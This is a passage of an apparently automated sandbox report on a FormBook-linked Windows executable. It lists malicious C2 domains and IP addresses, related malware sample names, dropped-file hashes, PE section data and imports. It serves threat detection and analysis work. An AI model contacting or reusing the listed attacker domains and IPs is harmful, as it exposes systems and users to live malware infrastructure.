                                                                  -pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                  • www.dfmagazine.shop/7k8f/
                                                                  DHL_ 46773482.exeGet hashmaliciousFormBookBrowse
                                                                  • www.agilizeimob.app/bnrj/
                                                                  Order.exeGet hashmaliciousFormBookBrowse
                                                                  • www.servehimfoundation.org/wlo5/
                                                                  Quote #260924.exeGet hashmaliciousFormBookBrowse
                                                                  • www.thepeatear.online/lu5k/
                                                                  Order 001-1.exeGet hashmaliciousFormBookBrowse
                                                                  • www.servehimfoundation.org/wlo5/

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  www.nad5.shopnotificacion_de_credito__PDF__.exeGet hashmaliciousFormBookBrowse
                                                                  • 156.226.22.233
                                                                  RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                                                  • 156.226.22.233
                                                                  INV & BANK DETAILS LETTER.pdf.exeGet hashmaliciousFormBookBrowse
                                                                  • 156.226.22.233
                                                                  September Order.exeGet hashmaliciousFormBookBrowse
                                                                  • 156.226.22.233
                                                                  www.impo232rt.xyzINV & BANK DETAILS LETTER.pdf.exeGet hashmaliciousFormBookBrowse
                                                                  • 176.32.38.141
                                                                  www.cenfresh.lifeSecuriteInfo.com.Win32.Malware-gen.10660.18305.exeGet hashmaliciousFormBookBrowse
                                                                  • 199.192.21.169
                                                                  INV & BANK DETAILS LETTER.pdf.exeGet hashmaliciousFormBookBrowse
                                                                  • 199.192.21.169

                                                                  ASNs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  NTT-LT-ASLTProducts Order Catalogs20242.exeGet hashmaliciousFormBookBrowse
                                                                  • 84.32.84.32
                                                                  YSjOEAta07.exeGet hashmaliciousFormBookBrowse
                                                                  • 84.32.84.32
                                                                  Pending invoices.exeGet hashmaliciousFormBookBrowse
                                                                  • 84.32.84.32
                                                                  SOA SEPT 2024.exeGet hashmaliciousFormBookBrowse
                                                                  • 84.32.84.32
                                                                  PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                  • 84.32.84.32
                                                                  1728239644b6c097b50f50c5ed70baa52a8cacbfdc1e82b38c0aa5c471e1a07dbef595bc59540.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                  • 84.32.44.139
                                                                  MKWbWHd5Ni.rtfGet hashmaliciousRemcosBrowse
                                                                  • 84.32.44.139
                                                                  Narudzba ACH0036173.vbeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 84.32.84.32
                                                                  http://ipscanadvsf.comGet hashmaliciousUnknownBrowse
                                                                  • 84.32.84.33
                                                                  GEJMING DUO USD 20241002144902.docx.docGet hashmaliciousRemcosBrowse
                                                                  • 84.32.44.139
                                                                  AISI-AS-APHKAISICLOUDCOMPUTINGLIMITEDHKnotificacion_de_credito__PDF__.exeGet hashmaliciousFormBookBrowse
                                                                  • 156.226.22.233
                                                                  RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                                                  • 156.226.22.233
                                                                  INV & BANK DETAILS LETTER.pdf.exeGet hashmaliciousFormBookBrowse
                                                                  • 156.226.22.233
                                                                  September Order.exeGet hashmaliciousFormBookBrowse
                                                                  • 156.226.22.233
                                                                  Tomcat.bin.exeGet hashmaliciousUnknownBrowse
                                                                  • 216.250.106.146
                                                                  b4cbf3ffbd8e152116e72487c3b16f1d.exeGet hashmaliciousUnknownBrowse
                                                                  • 216.250.106.146
                                                                  Tomcat.bin.exeGet hashmaliciousUnknownBrowse
                                                                  • 216.250.106.146
                                                                  b4cbf3ffbd8e152116e72487c3b16f1d.exeGet hashmaliciousUnknownBrowse
                                                                  • 216.250.106.146
                                                                  jURI57sJ9G.exeGet hashmaliciousGhostRat, NitolBrowse
                                                                  • 154.211.23.99
                                                                  Shipment_Document_BL,INV_and_packing_list.jpg.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                  • 154.205.10.163
                                                                  ASBAXETRUna.elfGet hashmaliciousUnknownBrowse
                                                                  • 46.29.161.108
                                                                  INV & BANK DETAILS LETTER.pdf.exeGet hashmaliciousFormBookBrowse
                                                                  • 176.32.38.141
                                                                  VZRdl605xh.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 176.32.39.130
                                                                  KtEQ20VGM9.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 176.32.39.130
                                                                  1qKutBuGUV.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 176.32.39.130
                                                                  5aNi3U9NPU.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 176.32.39.130
                                                                  c2wtBlVImo.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 176.32.39.130
                                                                  QjIppLmakb.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 176.32.39.130
                                                                  LockyRansom.exeGet hashmaliciousUnknownBrowse
                                                                  • 46.17.44.153
                                                                  LockyRansom.exeGet hashmaliciousUnknownBrowse
                                                                  • 46.17.44.153
                                                                  NAMECHEAP-NETUSFDA.exeGet hashmaliciousFormBookBrowse
                                                                  • 198.54.125.199
                                                                  PURCHASED ORDER OF ENG091.exeGet hashmaliciousFormBookBrowse
                                                                  • 63.250.38.167
                                                                  na.elfGet hashmaliciousMiraiBrowse
                                                                  • 162.255.117.53
                                                                  PO_89_202876.Pdf.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • 198.54.114.247
                                                                  Products Order Catalogs20242.exeGet hashmaliciousFormBookBrowse
                                                                  • 68.65.122.222
                                                                  IRYzGMMbSw.exeGet hashmaliciousFormBookBrowse
                                                                  • 162.213.249.216
                                                                  Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                  • 162.0.238.238
                                                                  Arrival notice.exeGet hashmaliciousFormBookBrowse
                                                                  • 162.0.238.246
                                                                  http://buddycities.com/Get hashmaliciousUnknownBrowse
                                                                  • 162.255.119.35
                                                                  http://buckboosters.com/Get hashmaliciousUnknownBrowse
                                                                  • 192.64.119.229

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\Temp\emboweling

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\8mmZ7Bkoj1.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):288256
                                                                  Entropy (8bit):7.994133338679452
                                                                  Encrypted:true
                                                                  SSDEEP:6144:7FTd3/4Mio99hAO8MZqJ39X4+6xAU9Mjz4o5J0cfD4c2XFF:BVZ99yJ9ox/9QVJ0cJC
                                                                  MD5:F9D7E9B85ADEA68BE938D26292592F40
                                                                  SHA1:EEB352FFA38F200C01D57421BE9C93CF01081D1D
                                                                  SHA-256:CCD27626028C724EAD4E096C60D76167DDCEA55B66E1CD6916BA1551372B2C1D
                                                                  SHA-512:32E74EF987C2BD3A55AF08BE1226016651C8497C09C3684769D47CE554B818F89E6E0C3603712197A44B7EB546530C08DE833C90F5F0DA6BEECF4E39ADA6296E
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:.....745H...L...v.7B...pVR..5HJ9FEGB99JI7AH9EXUZL745HJ9FEG.99JG(.F9.Q.{.6x.i.Q/6g2KV-;V,hZ$6;58.VPh8L(e.,.}...,'] vXWF.45HJ9FE>C0.w)P.uY".h:+.....&".X...uW&.#..f,P.g!)Q{% .99JI7AH9..UZ.655.$E.EGB99JI7.H;DSTQL7`1HJ9FEGB99.]7AH)EXU*H745.J9VEGB;9JO7AH9EXU\L745HJ9F5CB9;JI7AH9GX..L7$5HZ9FEGR99ZI7AH9EHUZL745HJ9FEGB99JI7AH9EXUZL745HJ9FEGB99JI7AH9EXUZL745HJ9FEGB99JI7AH9EXUZL745HJ9FEGB99JI7AH9EXUZL745HJ9FEGB99JI7AH9EXUZL745HJ9FEGB99JgC$0MEXUn.345XJ9F.CB9)JI7AH9EXUZL745hJ9&EGB99JI7AH9EXUZL745HJ9FEGB99JI7AH9EXUZL745HJ9FEGB99JI7AH9EXUZL745HJ9FEGB99JI7AH9EXUZL745HJ9FEGB99JI7AH9EXUZL745HJ9FEGB99JI7AH9EXUZL745HJ9FEGB99JI7AH9EXUZL745HJ9FEGB99JI7AH9EXUZL745HJ9FEGB99JI7AH9EXUZL745HJ9FEGB99JI7AH9EXUZL745HJ9FEGB99JI7AH9EXUZL745HJ9FEGB99JI7AH9EXUZL745HJ9FEGB99JI7AH9EXUZL745HJ9FEGB99JI7AH9EXUZL745HJ9FEGB99JI7AH9EXUZL745HJ9FEGB99JI7AH9EXUZL745HJ9FEGB99JI7AH9EXUZL745HJ9FEGB99JI7AH9EXUZL745HJ9FEGB99JI7AH9EXUZL745HJ9FEGB99JI7AH9EXUZL745HJ9FEGB99JI7AH9EXUZL745HJ9FEGB99JI7AH9EXUZL745HJ9FEGB99JI7AH9EXUZL745HJ9

                                                                  C:\Users\user\AppData\Local\Temp\g6sPb5

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\makecab.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                  Category:dropped
                                                                  Size (bytes):114688
                                                                  Entropy (8bit):0.9746603542602881
                                                                  Encrypted:false
                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                  Malicious:false
                                                                  Reputation:high, very likely benign file
                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):7.543293751073524
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:8mmZ7Bkoj1.exe
                                                                  File size:1'366'295 bytes
                                                                  MD5:cce5d60668494a747ca41f5d8b17e76a
                                                                  SHA1:9f29f6cad0687318f9ce75c0145b68914fd0e422
                                                                  SHA256:64c5d2e74511fbe252cb0351a21a86df6d98ac07bd4cc92a35086b1b1659257a
                                                                  SHA512:b5c5c320ab51db83777ee65a1c245521fd3541827f793dc361cebea49f5890a2049b06aa347b5c373e37490573f748bc5815cbaa856ec32c83323730179781c2
                                                                  SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCXPridnU0jF/veqwVbb+PVZzsb5Utin8:7JZoQrbTFZY1iaCXPrULDwVf+PV2bX8
                                                                  TLSH:F955E122F5D69036C2B323719E7EF7699A3D79361336D29B23C81E215EA04416B39733
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..

                                                                  File Icon

                                                                  Icon Hash:1733312925935517

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x4165c1
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:5
                                                                  OS Version Minor:0
                                                                  File Version Major:5
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:5
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  call 00007F0D7084BD6Bh
                                                                  jmp 00007F0D70842BDEh
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  push edi
                                                                  push esi
                                                                  mov esi, dword ptr [ebp+0Ch]
                                                                  mov ecx, dword ptr [ebp+10h]
                                                                  mov edi, dword ptr [ebp+08h]
                                                                  mov eax, ecx
                                                                  mov edx, ecx
                                                                  add eax, esi
                                                                  cmp edi, esi
                                                                  jbe 00007F0D70842D5Ah
                                                                  cmp edi, eax
                                                                  jc 00007F0D70842EF6h
                                                                  cmp ecx, 00000080h
                                                                  jc 00007F0D70842D6Eh
                                                                  cmp dword ptr [004A9724h], 00000000h
                                                                  je 00007F0D70842D65h
                                                                  push edi
                                                                  push esi
                                                                  and edi, 0Fh
                                                                  and esi, 0Fh
                                                                  cmp edi, esi
                                                                  pop esi
                                                                  pop edi
                                                                  jne 00007F0D70842D57h
                                                                  jmp 00007F0D70843132h
                                                                  test edi, 00000003h
                                                                  jne 00007F0D70842D66h
                                                                  shr ecx, 02h
                                                                  and edx, 03h
                                                                  cmp ecx, 08h
                                                                  jc 00007F0D70842D7Bh
                                                                  rep movsd
                                                                  jmp dword ptr [00416740h+edx*4]
                                                                  mov eax, edi
                                                                  mov edx, 00000003h
                                                                  sub ecx, 04h
                                                                  jc 00007F0D70842D5Eh
                                                                  and eax, 03h
                                                                  add ecx, eax
                                                                  jmp dword ptr [00416654h+eax*4]
                                                                  jmp dword ptr [00416750h+ecx*4]
                                                                  nop
                                                                  jmp dword ptr [004166D4h+ecx*4]
                                                                  nop
                                                                  inc cx
                                                                  add byte ptr [eax-4BFFBE9Ah], dl
                                                                  inc cx
                                                                  add byte ptr [ebx], ah
                                                                  ror dword ptr [edx-75F877FAh], 1
                                                                  inc esi
                                                                  add dword ptr [eax+468A0147h], ecx
                                                                  add al, cl
                                                                  jmp 00007F0D72CBB557h
                                                                  add esi, 03h
                                                                  add edi, 03h
                                                                  cmp ecx, 08h
                                                                  jc 00007F0D70842D1Eh
                                                                  rep movsd
                                                                  jmp dword ptr [00000000h+edx*4]

                                                                  Rich Headers

                                                                  Programming Language:
                                                                  • [ C ] VS2010 SP1 build 40219
                                                                  • [C++] VS2010 SP1 build 40219
                                                                  • [ C ] VS2008 SP1 build 30729
                                                                  • [IMP] VS2008 SP1 build 30729
                                                                  • [ASM] VS2010 SP1 build 40219
                                                                  • [RES] VS2010 SP1 build 40219
                                                                  • [LNK] VS2010 SP1 build 40219

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                  RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                  RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                  RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                  RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                                  RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                                  RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                                  RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                                  RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                                  RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                  RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                  RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                  RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                                  RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                  RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                  RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                  RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                                                                  RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                                                                  RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                                                                  RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                                                                  RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                  RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                                                                  RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                                                                  RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                                                                  RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                                                                  RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                                                                  RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                                                  Imports

                                                                  DLLImport
                                                                  WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                  VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                  COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                  MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                  WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                  PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                  USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                  KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                                                  USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                                  GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                                  COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                  ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                                  SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                  ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
